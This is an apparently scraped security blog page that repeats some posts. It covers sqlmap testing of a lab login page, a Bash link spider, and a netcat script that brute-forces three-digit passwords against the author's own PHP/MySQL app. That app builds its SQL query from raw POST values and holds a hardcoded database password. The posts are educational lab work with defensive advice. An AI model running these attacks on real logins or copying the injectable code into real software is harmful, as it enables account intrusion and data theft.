In a previous post I designed a simple web page that would accept a username and password. I chose to test this same page for sql injections with a tool called sqlmap.
First taking the server response from a previous post I noticed the data was posted as "username=test&password=test". Then I took this information and created the sqlmap command I was going to run.
python sqlmap.py --data="username=test&password=test" --url="http://test.local" -t http.log
It was after some research that I found the "-t" option. This outputs to a file the server and client responses in plain text or the encoding used.
The http.log was a lot easier to use then wireshark that I initially was using. I wanted to understand more of how sqlmap could gather the database name, table name and then the contents of this.
I grepped the http.log file for the keyword username= and found after url-decoding the SQL statements being sent back and forth. Then I analyzed the Set-cookie for the data that was being leaked.
Observations to note:
1. Verify when you create variable that passes data that the size of the variable is checked. If the size of the username or password was truncated it would have not allowed sqlmap to gather the data that it needed.
2. Sanitize the data as it is passed to a POST or GET type variable
3. Hackers will hide from the http logs what they are trying to accomplish because the data is not being recorded in the URL
4. If the username and password were incorrect the sqlmap tool would not work properly.
5. Be careful disclosing the errors that may occur in a sql query or web page errors. This could give hackers a clue as to how your application is designed.
Twitter: @lokut
This blog is for educational purposes only. The opinions expressed in this blog are my own and do not reflect the views of my employers.
Sunday, September 9, 2012
Monday, September 3, 2012
Simple Bash HTTP Spider
I was tasked with finding broken links and links that did not link directly with a parent site. Here is the simple Bash HTTP Spider that I wrote. The followMaster.txt has the list of URLs referring to the parent site. The links_outside.txt and links_outsideNew.txt have the external links or ones without the URL as the argument in them.
Usage: ./spider.sh http://url.url
#!/bin/bash
# This script is design to spider a web site for URLs
# The first argument is the URL that will be spidered...
# This core URL will remain as the spider goes through the site
# Will spider 5 rounds through the URLs found
if [ $# -eq 0 ]; then
echo "Example: ./spider.sh url"
echo "URL - URL to spider"
echo ""
exit
fi
wget $1 -O main.txt
cat main.txt | grep "a href" | sed 's/.*<a href="//' | sed 's/">.*//' | awk '{print $1}' | grep -v -e "javascript:" | sed 's/"//' | grep "$1" | sort | uniq
> follow.txt
cat main.txt | grep "a href" | sed 's/.*<a href="//' | sed 's/">.*//' | awk '{print $1}' | grep -v -e "javascript:" | sed 's/"//' | grep -v "$1" | sort | un
iq > links_outside.txt
cp follow.txt followMaster.txt
rm -f followNew.txt
rm -f links_outsideNew.txt
touch followNew.txt
touch links_outsideNew.txt
for i in {1..5}
do
while read line
do
wget $line -O child.txt
cat child.txt | grep "a href" | sed 's/.*<a href="//' | sed 's/">.*//' | awk '{print $1}' | grep -v -e "javascript:" | sed 's/"//' | grep "$
1" | sort | uniq >> followNew.txt
cat child.txt | grep "a href" | sed 's/.*<a href="//' | sed 's/">.*//' | awk '{print $1}' | grep -v -e "javascript:" | sed 's/"//' | grep -v
"$1" | sort | uniq >> links_outsideNew.txt
done < "follow.txt"
# Sort and find the uniq links from the loops above for links related to the the company
cat followNew.txt | sort | uniq > followNew.temp
cat followNew.temp > followNew.txt
# Sort and find the uniq links from the loops above for the links not related to the company
cat links_outsideNew.txt | sort | uniq > links_outsideNew.temp
cat links_outsideNew.temp > links_outsideNew.txt
# Compare the links in follow and followNew and add to the followMaster file
comm follow.txt followNew.txt -1 -3 > followMaster.temp
# Append to the followMaster main file
cat followMaster.temp >> followMaster.txt
# Recreate a followMaster file of the URLs found and scanned
cat followMaster.txt | sort | uniq > followMaster.temp
cat followMaster.temp > followMaster.txt
# Recreate the follow.txt file for another round if specified in the for loop
comm followMaster.txt followNew.txt -1 -3 > follow.txt
done
Usage: ./spider.sh http://url.url
#!/bin/bash
# This script is design to spider a web site for URLs
# The first argument is the URL that will be spidered...
# This core URL will remain as the spider goes through the site
# Will spider 5 rounds through the URLs found
if [ $# -eq 0 ]; then
echo "Example: ./spider.sh url"
echo "URL - URL to spider"
echo ""
exit
fi
wget $1 -O main.txt
cat main.txt | grep "a href" | sed 's/.*<a href="//' | sed 's/">.*//' | awk '{print $1}' | grep -v -e "javascript:" | sed 's/"//' | grep "$1" | sort | uniq
> follow.txt
cat main.txt | grep "a href" | sed 's/.*<a href="//' | sed 's/">.*//' | awk '{print $1}' | grep -v -e "javascript:" | sed 's/"//' | grep -v "$1" | sort | un
iq > links_outside.txt
cp follow.txt followMaster.txt
rm -f followNew.txt
rm -f links_outsideNew.txt
touch followNew.txt
touch links_outsideNew.txt
for i in {1..5}
do
while read line
do
wget $line -O child.txt
cat child.txt | grep "a href" | sed 's/.*<a href="//' | sed 's/">.*//' | awk '{print $1}' | grep -v -e "javascript:" | sed 's/"//' | grep "$
1" | sort | uniq >> followNew.txt
cat child.txt | grep "a href" | sed 's/.*<a href="//' | sed 's/">.*//' | awk '{print $1}' | grep -v -e "javascript:" | sed 's/"//' | grep -v
"$1" | sort | uniq >> links_outsideNew.txt
done < "follow.txt"
# Sort and find the uniq links from the loops above for links related to the the company
cat followNew.txt | sort | uniq > followNew.temp
cat followNew.temp > followNew.txt
# Sort and find the uniq links from the loops above for the links not related to the company
cat links_outsideNew.txt | sort | uniq > links_outsideNew.temp
cat links_outsideNew.temp > links_outsideNew.txt
# Compare the links in follow and followNew and add to the followMaster file
comm follow.txt followNew.txt -1 -3 > followMaster.temp
# Append to the followMaster main file
cat followMaster.temp >> followMaster.txt
# Recreate a followMaster file of the URLs found and scanned
cat followMaster.txt | sort | uniq > followMaster.temp
cat followMaster.temp > followMaster.txt
# Recreate the follow.txt file for another round if specified in the for loop
comm followMaster.txt followNew.txt -1 -3 > follow.txt
done
Brute Force HTTP Login
The purpose of this post is to better understand how to brute force an HTTP login. So I took the time to design a real simple web application in php with a MySQL database. This is so I could have a test server to work from.
The php code is below that I used:
<HTML>
<BODY>
<FORM NAME="index" method="POST" action="checklogin.php">
<?php
echo '<TABLE><TR>';
echo '<TD>Username</TD><TD><input type=text name=username size=20></TD>';
echo '</TR><TR>';
echo '<TD>Password</TD><TD><input type=password name=password size=20></TD>';
echo '</TR><TR>';
echo '<TD COLSPAN=2><CENTER><input type=submit value=Login></CENTER></TD>';
echo '</TR></TABLE>';
?>
</FORM>
</BODY>
</HTML>
The php code for checklogin.php is also below:
<HTML>
<BODY>
<?php
$host="localhost";
$username="dbuser";
$password="123";
$db_name="login";
$tbl_name="usersTable";
mysql_connect("$host", "$username", "$password")or die("cannot connect");
mysql_select_db("$db_name")or die("cannot select DB");
$usernamePOST=$_POST['username'];
$passwordPOST=$_POST['password'];
$loginSuccess = 'No';
$sql="SELECT * FROM $tbl_name WHERE username='$usernamePOST' and password='$passwordPOST'";
$result=mysql_query($sql);
while ($row = mysql_fetch_array($result)) {
$userApp = $row['username'];
$passApp = $row['password'];
if (($userApp == $usernamePOST) && ($passApp == $passwordPOST)) {
$loginSuccess = 'Yes';
}
}
if ($loginSuccess == 'Yes') {
echo "Login was Successful!";
}
else {
echo "Login was unsuccessful!";
}
?>
</BODY>
</HTML>
Then I used wireshark to capture the packet that went between the web browser and the web application. This packet tells me the language that I can use to interact using nc (netcat) with the web page that I built. The ASCII text of the packet that I need is below:
POST /checklogin.php HTTP/1.1
Host: test.local
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:10.0.2) Gecko/20100101 Firefox/10.0
.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9, */*;q=o.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://test.local/
Content-Type: application/x-www-form-urlencoded
Content-Length: 27
username=test&password=test
After gathering the packet now I needed a script that would brute force the username and/or password. For simplicity I chose the username test and then a 3 digit password to design the script around. I had to pay attention to the content length variable because it would change based on the length of the username or password.
In designing the script I had to also place a delay in the script due to it quickly reaching the maximum number of connections on a web server. Then I also had to when nc (netcat) was called the connection would stay open for 5 seconds so I placed a delay in the script of 2-5 seconds. Also to avoid hitting the DNS server multiple times I placed the IP address into the nc (netcat) command. The biggest change I had to make was to remove the Accept-Encoding: gzip line or else the response sent back would be gzipped. With removing this I was able to get back the clear text response from the server.
The bash script I wrote is below:
#!/bin/bash
# 1st character
for i in {0..9}
do
# 2nd character
for j in {0..9}
do
# 3rd character
for k in {0..9}
do
password=$i$j$k
length=`expr length $password`
# 4. Populate HTTP POST
echo "POST /checklogin.php HTTP/1.1" > temp/post-reply$i$j$k.txt
echo "Host: server.local" >> temp/post-reply$i$j$k.txt
echo "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:10.0.2) Gecko/20100101 Firefox/10.0.2" >> temp/post-reply$i$j$k.txt
echo "Accept: text/html,application/xhtml+xml,application/xml;q=0.9, */*;q=o.8" >> temp/post-reply$i$j$k.txt
echo "Accept-Language: en-us,en;q=0.5" >> temp/post-reply$i$j$k.txt
echo "Connection: keep-alive" >> temp/post-reply$i$j$k.txt
echo "Referer: http://server.local/" >> temp/post-reply$i$j$k.txt
echo "Content-Type: application/x-www-form-urlencoded" >> temp/post-reply$i$j$k.txt
if [ $length = 1 ]; then
echo "Content-Length: 24" >> temp/post-reply$i$j$k.txt
fi
if [ $length = 2 ]; then
echo "Content-Length: 25" >> temp/post-reply$i$j$k.txt
fi
if [ $length = 3 ]; then
echo "Content-Length: 26" >> temp/post-reply$i$j$k.txt
fi
echo "" >> temp/post-reply$i$j$k.txt
echo "username=test&password=$password" >> temp/post-reply$i$j$k.txt
echo "" >> temp/post-reply$i$j$k.txt
echo "" >> temp/post-reply$i$j$k.txt
nc 10.172.172.2 80 < temp/post-reply$i$j$k.txt > response/response$i$j$k.txt &
sleep 3
done
done
done
This was a success in being able to find the username of test and password of '123' due to the web page returning different results when it was successful.
To control the brute-force attack you could place a temporary time delayed lock out on the account after so many successive tries. This was a first of many exercises I will be posting... Enjoy!
The php code is below that I used:
<HTML>
<BODY>
<FORM NAME="index" method="POST" action="checklogin.php">
<?php
echo '<TABLE><TR>';
echo '<TD>Username</TD><TD><input type=text name=username size=20></TD>';
echo '</TR><TR>';
echo '<TD>Password</TD><TD><input type=password name=password size=20></TD>';
echo '</TR><TR>';
echo '<TD COLSPAN=2><CENTER><input type=submit value=Login></CENTER></TD>';
echo '</TR></TABLE>';
?>
</FORM>
</BODY>
</HTML>
The php code for checklogin.php is also below:
<HTML>
<BODY>
<?php
$host="localhost";
$username="dbuser";
$password="123";
$db_name="login";
$tbl_name="usersTable";
mysql_connect("$host", "$username", "$password")or die("cannot connect");
mysql_select_db("$db_name")or die("cannot select DB");
$usernamePOST=$_POST['username'];
$passwordPOST=$_POST['password'];
$loginSuccess = 'No';
$sql="SELECT * FROM $tbl_name WHERE username='$usernamePOST' and password='$passwordPOST'";
$result=mysql_query($sql);
while ($row = mysql_fetch_array($result)) {
$userApp = $row['username'];
$passApp = $row['password'];
if (($userApp == $usernamePOST) && ($passApp == $passwordPOST)) {
$loginSuccess = 'Yes';
}
}
if ($loginSuccess == 'Yes') {
echo "Login was Successful!";
}
else {
echo "Login was unsuccessful!";
}
?>
</BODY>
</HTML>
Then I used wireshark to capture the packet that went between the web browser and the web application. This packet tells me the language that I can use to interact using nc (netcat) with the web page that I built. The ASCII text of the packet that I need is below:
POST /checklogin.php HTTP/1.1
Host: test.local
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:10.0.2) Gecko/20100101 Firefox/10.0
.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9, */*;q=o.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://test.local/
Content-Type: application/x-www-form-urlencoded
Content-Length: 27
username=test&password=test
After gathering the packet now I needed a script that would brute force the username and/or password. For simplicity I chose the username test and then a 3 digit password to design the script around. I had to pay attention to the content length variable because it would change based on the length of the username or password.
In designing the script I had to also place a delay in the script due to it quickly reaching the maximum number of connections on a web server. Then I also had to when nc (netcat) was called the connection would stay open for 5 seconds so I placed a delay in the script of 2-5 seconds. Also to avoid hitting the DNS server multiple times I placed the IP address into the nc (netcat) command. The biggest change I had to make was to remove the Accept-Encoding: gzip line or else the response sent back would be gzipped. With removing this I was able to get back the clear text response from the server.
The bash script I wrote is below:
#!/bin/bash
# 1st character
for i in {0..9}
do
# 2nd character
for j in {0..9}
do
# 3rd character
for k in {0..9}
do
password=$i$j$k
length=`expr length $password`
# 4. Populate HTTP POST
echo "POST /checklogin.php HTTP/1.1" > temp/post-reply$i$j$k.txt
echo "Host: server.local" >> temp/post-reply$i$j$k.txt
echo "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:10.0.2) Gecko/20100101 Firefox/10.0.2" >> temp/post-reply$i$j$k.txt
echo "Accept: text/html,application/xhtml+xml,application/xml;q=0.9, */*;q=o.8" >> temp/post-reply$i$j$k.txt
echo "Accept-Language: en-us,en;q=0.5" >> temp/post-reply$i$j$k.txt
echo "Connection: keep-alive" >> temp/post-reply$i$j$k.txt
echo "Referer: http://server.local/" >> temp/post-reply$i$j$k.txt
echo "Content-Type: application/x-www-form-urlencoded" >> temp/post-reply$i$j$k.txt
if [ $length = 1 ]; then
echo "Content-Length: 24" >> temp/post-reply$i$j$k.txt
fi
if [ $length = 2 ]; then
echo "Content-Length: 25" >> temp/post-reply$i$j$k.txt
fi
if [ $length = 3 ]; then
echo "Content-Length: 26" >> temp/post-reply$i$j$k.txt
fi
echo "" >> temp/post-reply$i$j$k.txt
echo "username=test&password=$password" >> temp/post-reply$i$j$k.txt
echo "" >> temp/post-reply$i$j$k.txt
echo "" >> temp/post-reply$i$j$k.txt
nc 10.172.172.2 80 < temp/post-reply$i$j$k.txt > response/response$i$j$k.txt &
sleep 3
done
done
done
This was a success in being able to find the username of test and password of '123' due to the web page returning different results when it was successful.
To control the brute-force attack you could place a temporary time delayed lock out on the account after so many successive tries. This was a first of many exercises I will be posting... Enjoy!
Subscribe to:
Posts (Atom)
Test Authentication from Linux Console using python3 pexpect
Working with the IT420 lab, you will discover that we need to discover a vulnerable user account. The following python3 script uses the pex...
-
Here is a quick walk through of GetBoo. The first item that I found was you can harvest the usernames of the existing users that are regist...
-
As I was glancing through the logs of my honeypots I spent some time to look at the following logs. In the past I have just overlooked them...
-
I thought I would work through a few of these web applications provided by OWASP on their broken web applications VM. The first one I th...
-
Today looking at the logs of the honeypots, I became curious based on the whois of the IP Addresses attempting to login to SSH which country...
-
Recently I was doing some scanning with a tool that is available on github called masscan. The tool allows you to configure a configuration...